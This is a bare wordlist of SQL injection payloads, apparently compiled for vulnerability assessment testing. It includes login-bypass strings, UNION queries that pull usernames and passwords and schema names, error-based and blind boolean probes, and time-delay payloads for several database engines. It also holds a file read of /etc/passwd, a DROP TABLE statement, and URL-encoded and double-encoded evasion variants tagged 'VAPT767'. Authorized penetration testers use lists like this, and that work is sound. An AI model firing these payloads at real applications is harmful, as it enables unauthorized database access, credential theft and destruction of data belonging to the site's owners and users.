' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
" OR "1"="1
" OR "1"="1" --
" OR "1"="1" /*
' OR 1=1 --
' OR 1=1#
' OR 1=1/*
' OR 'a'='a
' OR 'a'='a' --
' OR 'a'='a' /*
' or ''='
' OR ''='
' OR ''=' --
') OR ('1'='1
') OR ('1'='1' --
")) OR ("1"="1
")) OR ("1"="1" --
' OR 0=0 --
' AND 1=0 UNION SELECT NULL--
' AND 1=0 UNION ALL SELECT NULL--
' UNION SELECT NULL--
' UNION SELECT 1,2,3--
' UNION SELECT NULL,NULL,NULL--
' UNION ALL SELECT username,password FROM users--
' UNION SELECT 1,@@version,3--
' UNION SELECT NULL,table_name FROM information_schema.tables--
' UNION SELECT NULL,column_name FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables--
' UNION SELECT 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name='users'--
" UNION SELECT NULL--
" UNION SELECT 1,2,3--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --
' AND (SELECT substring((SELECT database()),1,1))='a' --
' AND (SELECT ascii(substring((SELECT database()),1,1)))=97 --
' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--
' OR IF(1=1,SLEEP(5),0)--
' OR IF(1=1,BENCHMARK(1000000,MD5(1)),0)--
' OR SLEEP(5)--
' OR pg_sleep(5)--
1 OR SLEEP(5)--
1; WAITFOR DELAY '0:0:5'--
1' WAITFOR DELAY '0:0:5' --
" OR IF(1=1,SLEEP(5),0)#
" OR IF(1=1,BENCHMARK(1000000,MD5(1)),0)#
" OR SLEEP(5)#
' OR (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT TOP 1 name FROM sysobjects) IS NOT NULL--
' AND EXISTS(SELECT * FROM users WHERE username='admin')--
' AND SUBSTRING((SELECT user()),1,1) = 'a' --
' AND (SELECT ASCII(SUBSTRING((SELECT user()),1,1))) = 97 --
' AND (SELECT LENGTH((SELECT database()))) > 0--
' AND (SELECT @@version) LIKE '%'--
' OR (SELECT CASE WHEN (1=1) THEN (SELECT SLEEP(5)) ELSE 0 END)=0--
' OR (SELECT COUNT(*) FROM information_schema.tables) > 0--
' OR (SELECT load_file('/etc/passwd')) IS NOT NULL--
' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))--
' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--
" and extractvalue(1,concat(0x7e,(select database()),0x7e))#
"} OR 1=1 --
"} OR 1=1#
"} OR "1"="1
"} OR "1"="1" --
]} OR 1=1 --
]} OR '1'='1' --
"} UNION SELECT NULL,NULL,NULL --
'); DROP TABLE IF EXISTS dummy; --
');-- 
"}; -- 
' OR (SELECT COUNT(*) FROM users WHERE 'a'='a')>0 --
admin'--
admin'#
admin'/* 
' OR login LIKE '%admin%' --
' OR username LIKE '%admin%' --
' OR email LIKE '%@%' --
' OR CONCAT(username,0x3a,password) LIKE '%admin%' --
' OR (SELECT CASE WHEN (SUBSTR((SELECT password FROM users LIMIT 1),1,1)='a') THEN SLEEP(5) ELSE 0 END)=0 --

VAPT767' AND SLEEP(5)--
VAPT767" AND SLEEP(5)--
VAPT767' OR SLEEP(5)--
VAPT767'||SLEEP(5)||'
VAPT767' AND IF(1=1,SLEEP(5),0)--
VAPT767' AND (SELECT SLEEP(5))--
VAPT767' AND BENCHMARK(5000000,MD5(1))--
VAPT767'; SELECT pg_sleep(5)--
VAPT767' AND pg_sleep(5)--
VAPT767'||pg_sleep(5)||'
VAPT767'; WAITFOR DELAY '0:0:5'--
VAPT767' WAITFOR DELAY '00:00:05'--
VAPT767;WAITFOR DELAY '0:0:5'--
VAPT767' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5)=0--
VAPT767'||DBMS_PIPE.RECEIVE_MESSAGE('a',5)||'
VAPT767' AND randomblob(500000000)--
VAPT767' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--
VAPT767' AND EXISTS(SELECT * FROM (SELECT SLEEP(5))x)--
VAPT767'/**/AND/**/SLEEP(5)--
VAPT767' AND SLEEP(5)#
VAPT767' AND SLEEP(5)/*
VAPT767%27%20AND%20SLEEP(5)--
VAPT767%27%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--
VAPT767%2527%2520AND%2520SLEEP(5)--
VAPT767%2527%253BWAITFOR%2520DELAY%2520%25270%253A0%253A5%2527--

